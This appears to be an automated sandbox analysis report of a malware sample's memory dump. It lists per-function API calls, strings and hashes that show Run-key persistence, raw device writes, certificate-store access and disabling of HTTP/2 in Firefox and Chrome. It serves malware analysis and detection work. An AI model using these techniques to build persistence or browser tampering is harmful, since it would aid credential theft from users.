Instruction Fuzzy Hash: 71412876D0021CBFEF119FA4DC849EEBBBDFB08344F10807AEA11B6150E635AE418B61

Uniqueness

Uniqueness Score: -1.00%

Function 04A0A105, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 90registrymemorystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 04A0A116
GetTempPathA.KERNEL32(00000000,00000000,?,?,049F11D8,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 04A0A12E
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 04A0A13D
GetTempPathA.KERNEL32(00000001,00000000,?,?,049F11D8,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 04A0A150
GetTickCount.KERNEL32 ref: 04A0A154
wsprintfA.USER32 ref: 04A0A164
RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 04A0A198
StrRChrA.SHLWAPI(00000000,00000000,?), ref: 04A0A1B3
lstrlen.KERNEL32(00000000), ref: 04A0A1BD
RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 04A0A1CD
RegCloseKey.ADVAPI32(?), ref: 04A0A1D9
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000094,00000000,00000001,00000094,00000000), ref: 04A0A1E7

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 04A0A18E
%lu.exe, xrefs: 04A0A15E

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
String ID: %lu.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 3778301466-2576086316
Opcode ID: 80c05a896464f03df6d3f0ac5c1fa897a021d03e3a3a9fe5f1ae88cdacf8ada5
Instruction ID: e323ab997faf1efb698801c2938591548750850a8a9fb9a9fac147e39493c385
Opcode Fuzzy Hash: 80c05a896464f03df6d3f0ac5c1fa897a021d03e3a3a9fe5f1ae88cdacf8ada5
Instruction Fuzzy Hash: DB217E71501218BFEB11AF60EC48DAF7FACEF25395B008015F906D6160E7399E52DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A07970, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 188memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 04A08991: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04A089D6
Part of subcall function 04A08991: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04A089EE
Part of subcall function 04A08991: WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08AB4
Part of subcall function 04A08991: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08ADD
Part of subcall function 04A08991: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08AED
Part of subcall function 04A08991: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,049F6FC2,04A10454,00000000,00000001), ref: 04A08AF6

lstrcmp.KERNEL32(?,00000000), ref: 04A079E7
HeapFree.KERNEL32(00000000,00000000,?,74B5F730,00000000), ref: 04A07A13
GetCurrentThreadId.KERNEL32 ref: 04A07AB9
GetCurrentThread.KERNEL32 ref: 04A07ACA
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,04A0052D,049F89BD,00000001,?,74B5F730,00000000), ref: 04A07B07
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,04A0052D,049F89BD,00000001,?,74B5F730,00000000), ref: 04A07B1B
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04A07B29
wsprintfA.USER32 ref: 04A07B3A
lstrlen.KERNEL32(00000000,00000000), ref: 04A07B45

Part of subcall function 04A0A99E: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,04A00C16,00000000,00000000,00000000,00000020,00000000,?,04A0C101,00000020,00000000,?,00000000), ref: 04A0A9A8
Part of subcall function 04A0A99E: lstrcpy.KERNEL32(00000000,00000000), ref: 04A0A9CC
Part of subcall function 04A0A99E: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,04A0C101,00000020,00000000,?,00000000,?,00000000,00000000), ref: 04A0A9D3
Part of subcall function 04A0A99E: lstrcat.KERNEL32(00000000,?), ref: 04A0AA2A

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 04A07B5F
HeapFree.KERNEL32(00000000,00000000), ref: 04A07B70
HeapFree.KERNEL32(00000000,?), ref: 04A07B7C

Strings

DLL load status: %u, xrefs: 04A07B34

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID: DLL load status: %u
API String ID: 773763258-2598350583
Opcode ID: a35934c5e196a6a24943bc064125746af016b184e307a762b98c67e744be8bd7
Instruction ID: d0172b030c9aee130a86cedcf1f0d8dd9f4d2e65331eccdfdb6b5dd07bc67d3e
Opcode Fuzzy Hash: a35934c5e196a6a24943bc064125746af016b184e307a762b98c67e744be8bd7
Instruction Fuzzy Hash: 6A710279900219EFDB11DFA4EC84EAEBBB5FF18350F048459E505A32A0D734BA51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A05C8D, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

memset.NTDLL ref: 04A05CBB
StrChrA.SHLWAPI(?,0000000D), ref: 04A05D01
StrChrA.SHLWAPI(?,0000000A), ref: 04A05D0E
StrChrA.SHLWAPI(?,0000007C), ref: 04A05D35
StrTrimA.SHLWAPI(?,04A13528), ref: 04A05D4A
StrChrA.SHLWAPI(?,0000003D), ref: 04A05D53
StrTrimA.SHLWAPI(00000001,04A13528), ref: 04A05D69
_strupr.NTDLL ref: 04A05D70
StrTrimA.SHLWAPI(?,?), ref: 04A05D7D
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 04A05DC5
lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?,04A0EBBA,?,049F8C13,049F8C13,00000001), ref: 04A05DE4

Strings

;, xrefs: 04A05D23
, xrefs: 04A05D75

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: 6c40a8a069930217989150d1fab5f77591282b5a18c23da97673cb0a83cee93e
Instruction ID: f533b3255aa327e33315773bf60ec4acf2cedc9b38a4cf5359f9859d3dfdae16
Opcode Fuzzy Hash: 6c40a8a069930217989150d1fab5f77591282b5a18c23da97673cb0a83cee93e
Instruction Fuzzy Hash: B241C471904306AFE721DF68AC44B1BBBE8EF58700F448819F9859B291DB74F9058FA6

Uniqueness

Uniqueness Score: -1.00%

Function 049F5D1E, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,74B05520,?,00000000,?,?,?), ref: 049F5D37
lstrlen.KERNEL32(?), ref: 049F5D3D
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 049F5D4D
lstrcpy.KERNEL32(00000000,?), ref: 049F5D67
lstrlen.KERNEL32(?), ref: 049F5D7F
lstrlen.KERNEL32(?), ref: 049F5D8D
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 049F5DDB
lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 049F5DFF
lstrlen.KERNEL32(?), ref: 049F5E2D
HeapFree.KERNEL32(00000000,?,?), ref: 049F5E58
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 049F5E6F
HeapFree.KERNEL32(00000000,?,?), ref: 049F5E7C

Strings

http, xrefs: 049F5E06, 049F5E16

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID: http
API String ID: 904523553-2541227442
Opcode ID: be22ce8bfc7bf8b1b121bff041aa413d4ca99107c90d83790fe44e53e3930d88
Instruction ID: 0488c488b84dda80e08eb6cd1fa893281e1d50a062125324b8dc28d8f3a86d3a
Opcode Fuzzy Hash: be22ce8bfc7bf8b1b121bff041aa413d4ca99107c90d83790fe44e53e3930d88
Instruction Fuzzy Hash: 42418C71900209FFDF219FA0DC88AAE7BB9FF08354F014466FA2496161D775AE51CF60

Uniqueness

Uniqueness Score: -1.00%

Function 049F6161, Relevance: 21.2, APIs: 14, Instructions: 201memorystringthreadCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 049F61B0
StrTrimA.SHLWAPI(00000001,20000920), ref: 049F61C9
StrChrA.SHLWAPI(?,0000002C), ref: 049F61D4
StrTrimA.SHLWAPI(00000001,20000920), ref: 049F61ED
lstrlen.KERNEL32(?), ref: 049F628B
RtlAllocateHeap.NTDLL(00000000,?), ref: 049F62AD
lstrcpy.KERNEL32(00000020,?), ref: 049F62CC
lstrlen.KERNEL32(?), ref: 049F62D6
memcpy.NTDLL(?,?,?), ref: 049F6317
memcpy.NTDLL(?,?,?), ref: 049F632A
SwitchToThread.KERNEL32(?,00000000,?,?), ref: 049F634E
HeapFree.KERNEL32(00000000,00000000), ref: 049F636D
HeapFree.KERNEL32(00000000,?), ref: 049F6393
HeapFree.KERNEL32(00000000,?), ref: 049F63AF

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 3323474148-0
Opcode ID: dad2a5b3e81281e7a18e1cefeabdb3c1ed71b4125e75be51839370a2e27b6bb2
Instruction ID: 8f8816d87dcf379dca76c96abc8edf87a6256f8ba06f98875c3a6d3ccca941e9
Opcode Fuzzy Hash: dad2a5b3e81281e7a18e1cefeabdb3c1ed71b4125e75be51839370a2e27b6bb2
Instruction Fuzzy Hash: 41715B31604301AFEB21DF64CC45B9ABBE9FB48314F04492EFA99D2260D774E946CB92

Uniqueness

Uniqueness Score: -1.00%

Function 049F1FDF, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 049F2021
OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 049F2034
CloseHandle.KERNEL32(00000000), ref: 049F214C

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

memset.NTDLL ref: 049F2057
memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 049F20D6
RtlEnterCriticalSection.NTDLL(?), ref: 049F20EB
RtlLeaveCriticalSection.NTDLL(?), ref: 049F2103
GetLastError.KERNEL32(04A0B370,?,?,?,?,?,?,?,00000040), ref: 049F211B
RtlEnterCriticalSection.NTDLL(?), ref: 049F2127
RtlLeaveCriticalSection.NTDLL(?), ref: 049F2136

Strings

0x%08X, xrefs: 049F1FF3
W, xrefs: 049F2152

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
String ID: 0x%08X$W
API String ID: 1559661116-2600449260
Opcode ID: e0a4c4effbecb3bfe88ce2d1cac9cac4959cf6d74e76e34759ada0ac9911f220
Instruction ID: f4db50903f40d89b09fb0619ce7478c04310251bd70a16c94449aaa0084dffe6
Opcode Fuzzy Hash: e0a4c4effbecb3bfe88ce2d1cac9cac4959cf6d74e76e34759ada0ac9911f220
Instruction Fuzzy Hash: 19414DB1900209EFEB10DFA4CD84A9EBBF8FF08744F108569EA49D7290D375AA55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 049FF79A, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI(?), ref: 049FF7B4
PathFindFileNameW.SHLWAPI(?), ref: 049FF7CA
lstrlenW.KERNEL32(00000000), ref: 049FF80D
RtlAllocateHeap.NTDLL(00000000,04A11927), ref: 049FF823
memcpy.NTDLL(00000000,00000000,04A11925), ref: 049FF836
_wcsupr.NTDLL ref: 049FF842
lstrlenW.KERNEL32(?), ref: 049FF878
RtlAllocateHeap.NTDLL(00000000,?), ref: 049FF88D
lstrcpyW.KERNEL32(00000000,?), ref: 049FF8A3
lstrcatW.KERNEL32(00000000, --use-spdy=off --disable-http2), ref: 049FF8C2
HeapFree.KERNEL32(00000000,00000000), ref: 049FF8D1

Strings

--use-spdy=off --disable-http2, xrefs: 049FF8BC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
String ID: --use-spdy=off --disable-http2
API String ID: 3868788785-3215622688
Opcode ID: 5de5afe734c08af0a9229aa7d2e5b1701a86fad623f33a12f9a64fd8a7bf9ab6
Instruction ID: a6866674f0459ebf0cb7ffb3df8bb2693a7f60e98ddb306bf8f33b82c79767a5
Opcode Fuzzy Hash: 5de5afe734c08af0a9229aa7d2e5b1701a86fad623f33a12f9a64fd8a7bf9ab6
Instruction Fuzzy Hash: 35311436700314ABDB205E749C8892F7BACEF98720F55053AFB16D21A4DB34BC428790

Uniqueness

Uniqueness Score: -1.00%

Function 04A0C06F, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 114memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 04A0C093
GetCurrentThreadId.KERNEL32 ref: 04A0C0A9
GetCurrentThread.KERNEL32 ref: 04A0C0BA

Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA299
Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC), ref: 049FA2B2
Part of subcall function 049FA287: GetCurrentThreadId.KERNEL32 ref: 049FA2BF
Part of subcall function 049FA287: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 049FA2CB
Part of subcall function 049FA287: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA2D9
Part of subcall function 049FA287: lstrcpy.KERNEL32(00000000), ref: 049FA2FB

Part of subcall function 04A00BFA: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,04A0C101,00000020,00000000,?,00000000), ref: 04A00C65
Part of subcall function 04A00BFA: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,04A0C101,00000020,00000000,?,00000000), ref: 04A00C8D

HeapFree.KERNEL32(00000000,?,00000020,?,?,00000020,00000000,?,00000000,?,00000000,00000000,00000000), ref: 04A0C12F
HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 04A0C13F
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04A0C18B
wsprintfA.USER32 ref: 04A0C19C
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,049F12EC,00000000), ref: 04A0C1A7
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,049F12EC,00000000), ref: 04A0C1C1

Strings

DLL load status: %u, xrefs: 04A0C196
PluginRegisterCallbacks, xrefs: 04A0C14B
W, xrefs: 04A0C178

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: DLL load status: %u$PluginRegisterCallbacks$W
API String ID: 630447368-2893651616
Opcode ID: 9098f4f9d7a1066b857588928c0f6ecb4eac3fbd65e261f59a5bbbee2b5d9e0c
Instruction ID: a2f6880211b6b3ac316484f03d9a747a5efd11c8dee82b4438a98e3cdefc2ab0
Opcode Fuzzy Hash: 9098f4f9d7a1066b857588928c0f6ecb4eac3fbd65e261f59a5bbbee2b5d9e0c
Instruction Fuzzy Hash: 74417174502215FBDF15AFA0EC489AF7FB9FF25754F008115F905921A0D738AA52DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A0FA8E, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 04A0FAAA

Part of subcall function 049F344D: RegCloseKey.ADVAPI32(?,?,?,04A0FACF,00000000,00000000,00000000,00000000,?,049F11C6), ref: 049F34D4

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,049F11C6), ref: 04A0FAE2
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,049F11C6), ref: 04A0FAF3
RegCreateKeyA.ADVAPI32(80000001,54464F53,?), ref: 04A0FB2E
RegSetValueExA.ADVAPI32(00000000,72617453,00000000,00000004,?,00000004,?,049F11C6), ref: 04A0FB50
RegCloseKey.ADVAPI32(?,?,049F11C6), ref: 04A0FB59
RtlEnterCriticalSection.NTDLL(00000000), ref: 04A0FB6F
HeapFree.KERNEL32(00000000,?,?,049F11C6), ref: 04A0FB84
RtlLeaveCriticalSection.NTDLL(00000000), ref: 04A0FB94
HeapFree.KERNEL32(00000000,?,?,049F11C6), ref: 04A0FBA9
RegCloseKey.ADVAPI32(?,?,049F11C6), ref: 04A0FBAE

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 04A0FA9A

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 534682438-1428018034
Opcode ID: 3a5e050bf76745b2a813b58274b8fffe13c138822faeeb452ab6474e80178749
Instruction ID: 92235bc8200d65a530dba000a69df62ceee84eadf17b189f2fa875740be48cfe
Opcode Fuzzy Hash: 3a5e050bf76745b2a813b58274b8fffe13c138822faeeb452ab6474e80178749
Instruction Fuzzy Hash: C4311675940108FFEF219FA4EC48DAEBBB9FB69700B148065F905E2160D779AE42DF60

Uniqueness

Uniqueness Score: -1.00%

Function 04A08FE1, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 78memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04A08FF8
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,049F137A,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 04A0900A
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,049F137A,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 04A09017
wsprintfA.USER32 ref: 04A0902B
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000094,00000000), ref: 04A09041
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 04A0905A
WriteFile.KERNEL32(00000000,00000000), ref: 04A09062
GetLastError.KERNEL32 ref: 04A09070
CloseHandle.KERNEL32(00000000), ref: 04A09079
GetLastError.KERNEL32(?,00000000,?,049F137A,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 04A0908A
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,049F137A,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 04A0909A

Strings

\\.\%s, xrefs: 04A09025

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID: \\.\%s
API String ID: 3873609385-869905501
Opcode ID: a325ee14c00f270205325eec696ec7958be818472118ae2295a86ce851836dd1
Instruction ID: 93486c3e9f0cd60125b22798ac1b3e31cc9f574ef191b1922d101d912aaf3d5f
Opcode Fuzzy Hash: a325ee14c00f270205325eec696ec7958be818472118ae2295a86ce851836dd1
Instruction Fuzzy Hash: 0E11E6B1201214BFFA206F25BC8CF7B7AACEB567A5F008125FD42D11D1DA695D02C771

Uniqueness

Uniqueness Score: -1.00%

Function 04A03DDF, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 65filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA299
Part of subcall function 049FA287: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC), ref: 049FA2B2
Part of subcall function 049FA287: GetCurrentThreadId.KERNEL32 ref: 049FA2BF
Part of subcall function 049FA287: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000,?,?,?,049F12EC,00000000), ref: 049FA2CB
Part of subcall function 049FA287: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A0C0E8,00000000,?,00000000,00000000,00000000), ref: 049FA2D9
Part of subcall function 049FA287: lstrcpy.KERNEL32(00000000), ref: 049FA2FB

DeleteFileA.KERNEL32(00000000,000004D2), ref: 04A03E02
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 04A03E0B
GetLastError.KERNEL32 ref: 04A03E15
HeapFree.KERNEL32(00000000,00000000), ref: 04A03E99

Strings

TrustedPeople, xrefs: 04A03E62
CertificateAuthority, xrefs: 04A03E41
TrustedPublisher, xrefs: 04A03E6D
AddressBook, xrefs: 04A03E2B
AuthRoot, xrefs: 04A03E36
Root, xrefs: 04A03E57
Disallowed, xrefs: 04A03E4C

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID: AddressBook$AuthRoot$CertificateAuthority$Disallowed$Root$TrustedPeople$TrustedPublisher
API String ID: 3543646443-3095660563
Opcode ID: 33734e1311207441e42136302f22d71dd9f537092b6632a6758def43d4191606
Instruction ID: f40fca957b6369600fdb07df272a239beb190828d145398665e244ce56ca4764
Opcode Fuzzy Hash: 33734e1311207441e42136302f22d71dd9f537092b6632a6758def43d4191606
Instruction Fuzzy Hash: 8F0165712D622573F92036B25C0DF8B2D9CEFA26B9F000221BB0EA5190DD947502D7F6

Uniqueness

Uniqueness Score: -1.00%

Function 04A03BC9, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0881F: RtlEnterCriticalSection.NTDLL(04A173A8), ref: 04A08827
Part of subcall function 04A0881F: RtlLeaveCriticalSection.NTDLL(04A173A8), ref: 04A0883C
Part of subcall function 04A0881F: InterlockedIncrement.KERNEL32(0000001C), ref: 04A08855

RtlAllocateHeap.NTDLL(00000000,00000018,Blocked), ref: 04A03BFF
memset.NTDLL ref: 04A03C10
lstrcmpi.KERNEL32(049F8C13,?), ref: 04A03C50
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04A03C79
memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,049FAE24), ref: 04A03C8D
memset.NTDLL ref: 04A03C9A
memcpy.NTDLL(-00000004,049F8C13,00000000,00000000,00000000,049F8C13,00000000,00000000,00000000,?,00000000), ref: 04A03CB3
memcpy.NTDLL(-00000005,HIDDEN,00000007,-00000004,049F8C13,00000000,00000000,00000000,049F8C13,00000000,00000000,00000000,?,00000000), ref: 04A03CCE
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,049FAE24), ref: 04A03CEB

Strings

Blocked, xrefs: 04A03BD2, 04A03CFB
HIDDEN, xrefs: 04A03CC8

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked$HIDDEN
API String ID: 694413484-4010945860
Opcode ID: 52c475142d5a9166271c098c1a49da87222f7d99a614eb0977214bc9c00afd00
Instruction ID: 562203009d967bfc0179f98ab282a0fe4b44103ffc3b4419dc50334131760895
Opcode Fuzzy Hash: 52c475142d5a9166271c098c1a49da87222f7d99a614eb0977214bc9c00afd00
Instruction Fuzzy Hash: FE41CD72E00218BFEF109FA0DC84B9EBBB9FB04714F108429E905E3290D739BA59CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04A0A2D6, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116registrysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?,77E61120,?,?,00000250,?,00000000), ref: 04A0AF5A
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?,?,00000000), ref: 04A0AF66
Part of subcall function 04A0AF0E: memset.NTDLL ref: 04A0AFAE
Part of subcall function 04A0AF0E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04A0AFC9
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(0000002C), ref: 04A0B001
Part of subcall function 04A0AF0E: lstrlenW.KERNEL32(?), ref: 04A0B009
Part of subcall function 04A0AF0E: memset.NTDLL ref: 04A0B02C
Part of subcall function 04A0AF0E: wcscpy.NTDLL ref: 04A0B03E

WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles,prefs.js,?,00000000,00000000,00000001), ref: 04A0A369
RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,?), ref: 04A0A398
RegSetValueExA.ADVAPI32(?,EnableSPDY3_0,00000000,00000004,00000000,00000004), ref: 04A0A3B4
RegCloseKey.ADVAPI32(?), ref: 04A0A3BD
WaitForSingleObject.KERNEL32(00000000), ref: 04A0A400
RtlExitUserThread.NTDLL(?), ref: 04A0A436

Part of subcall function 049F8F6B: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04A058BE,00000000,00000057,00000057), ref: 049F8F89
Part of subcall function 049F8F6B: GetFileSize.KERNEL32(00000000,00000000,?,?,04A058BE,00000000,00000057,00000057,?,?,-00000007,04A0A28F,-00000007,00000000,?), ref: 049F8F99
Part of subcall function 049F8F6B: CloseHandle.KERNEL32(000000FF,?,?,04A058BE,00000000,00000057,00000057,?,?,-00000007,04A0A28F,-00000007,00000000,?,?,?), ref: 049F8FFB

Part of subcall function 049F2815: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,04A0EA24), ref: 049F2855
Part of subcall function 049F2815: GetLastError.KERNEL32 ref: 049F285F
Part of subcall function 049F2815: WaitForSingleObject.KERNEL32(000000C8), ref: 049F2884
Part of subcall function 049F2815: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 049F28A7
Part of subcall function 049F2815: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 049F28CF
Part of subcall function 049F2815: WriteFile.KERNEL32(00000006,00001388,?,?,00000000), ref: 049F28E4
Part of subcall function 049F2815: SetEndOfFile.KERNEL32(00000006), ref: 049F28F1
Part of subcall function 049F2815: CloseHandle.KERNEL32(00000006), ref: 049F2909

Strings

user_pref("network.http.spdy.enabled", false);, xrefs: 04A0A321, 04A0A337
prefs.js, xrefs: 04A0A2EE
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 04A0A38E
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 04A0A2F3
EnableSPDY3_0, xrefs: 04A0A3AC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
